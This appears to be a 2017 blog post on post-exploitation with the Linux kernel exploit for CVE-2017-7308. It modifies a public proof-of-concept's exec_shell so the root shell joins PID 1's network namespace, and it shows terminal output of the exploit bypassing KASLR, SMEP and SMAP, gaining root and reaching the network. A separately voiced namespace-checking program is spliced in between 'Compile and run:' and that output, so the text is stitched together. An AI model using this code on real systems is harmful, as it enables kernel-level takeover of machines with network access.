Post-exploitation with CVE-2017-7308

November 9, 2017 • Security

Paper: https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308

The general idea is as follows:

The exploit's shell ends up isolated from the real network interfaces (it runs inside the PoC's sandbox network namespace), so some network-related breakout is needed after exploitation.

After obtaining root, join PID 1's network namespace. To do that we first need a file descriptor that refers to PID 1's network namespace:

int fd;
fd = open("/proc/1/ns/net", O_RDONLY);

With that file descriptor we can call setns; the second argument names the namespace type we want to join:

setns(fd, CLONE_NEWNET);

Modify exec_shell in the PoC so that the namespace switch happens once privileges have been escalated:

PoC: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308

/* Requires _GNU_SOURCE and <sched.h> for setns() and CLONE_NEWNET,
 * plus <fcntl.h>, <stdio.h>, <stdlib.h> and <unistd.h>. */
void exec_shell() {
        char *shell = "/bin/bash";
        char *args[] = {shell, "-i", NULL};

        int fd;

        /* /proc/1/ns/net is a handle on init's (the host's) network namespace;
         * opening it needs the root privileges obtained by the exploit. */
        fd = open("/proc/1/ns/net", O_RDONLY);
        if (fd == -1)
        {
                perror("error opening /proc/1/ns/net");
                exit(EXIT_FAILURE);
        }

        /* Move this process into that namespace before spawning the shell. */
        if (setns(fd, CLONE_NEWNET) == -1)
        {
                perror("error calling setns");
                exit(EXIT_FAILURE);
        }

        execve(shell, args, NULL);
}

Compile and run:
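As an added, defender-side complement (not code from the original post or from the PoC): the same /proc/&lt;pid&gt;/ns/net links that the exploit opens can be compared to tell whether a process shares PID 1's network namespace, which is how one verifies that a sandboxed process has stayed confined (or, after the modification above, has left its sandbox). The function names and the stat()-based comparison are my own; reading another process's ns link needs ptrace-read access to it, so the PID 1 check only works as root.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if both PIDs are in the same network namespace, 0 if they differ,
 * and -1 if either namespace cannot be inspected (no such PID, or no
 * permission to read that process's /proc/<pid>/ns/net link). */
int same_net_ns(pid_t a, pid_t b) {
    char pa[64], pb[64];
    struct stat sa, sb;

    snprintf(pa, sizeof pa, "/proc/%d/ns/net", (int)a);
    snprintf(pb, sizeof pb, "/proc/%d/ns/net", (int)b);

    /* stat() follows the magic symlink; st_dev/st_ino identify the nsfs
     * inode, which is unique per namespace instance. */
    if (stat(pa, &sa) == -1 || stat(pb, &sb) == -1)
        return -1;

    return (sa.st_dev == sb.st_dev && sa.st_ino == sb.st_ino) ? 1 : 0;
}

/* Does the calling process share the network namespace of PID 1? */
int in_init_net_ns(void) {
    return same_net_ns(getpid(), 1);
}

int main(void) {
    int r = in_init_net_ns();
    if (r == -1)
        perror("cannot compare against /proc/1/ns/net (needs root)");
    else
        printf("this process is %s PID 1's network namespace\n",
               r ? "in" : "NOT in");
    return 0;
}
```

Run it from inside the exploit's sandbox shell and again after the modified exec_shell: the answer flips from "NOT in" to "in", which is the observable effect the post describes.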

fastix@fastix-virtual-machine:~$ gcc cve-2017-7308.c -o exploit
fastix@fastix-virtual-machine:~$ ./exploit 
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[.] done, kernel text:   ffffffffb5800000
[.] commit_creds:        ffffffffb58a5cf0
[.] prepare_kernel_cred: ffffffffb58a60e0
[.] native_write_cr4:    ffffffffb5864210
[.] padding heap
[.] done, heap is padded
[.] SMEP & SMAP bypass enabled, turning them off
[.] done, SMEP & SMAP should be off now
[.] executing get root payload 0x55fa39fa7612
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@fastix-virtual-machine:/home/fastix# id
uid=0(root) gid=0(root) groups=0(root)
root@fastix-virtual-machine:/home/fastix# ip link list
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
    link/ether 00:0c:29:98:3b:85 brd ff:ff:ff:ff:ff:ff
root@fastix-virtual-machine:/home/fastix# ifconfig 
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.112  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::5cd:ee6f:92b:ccc6  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:98:3b:85  txqueuelen 1000  (Ethernet)
        RX packets 69  bytes 9044 (9.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 85  bytes 9782 (9.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 3329  bytes 206245 (206.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3329  bytes 206245 (206.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@fastix-virtual-machine:/home/fastix# ping www.google.com
PING www.google.com (216.58.202.132) 56(84) bytes of data.
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=1 ttl=50 time=52.7 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=2 ttl=50 time=54.6 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=3 ttl=50 time=51.9 ms
64 bytes from gru06s29-in-f4.1e100.net (216.58.202.132): icmp_seq=4 ttl=50 time=53.7 ms
^C
--- www.google.com ping statistics ---
5 packets transmitted, 4 received, 20% packet loss, time 4008ms
rtt min/avg/max/mdev = 51.987/53.268/54.686/1.045 ms

The shell now sees the ens33 interface and can reach the external network.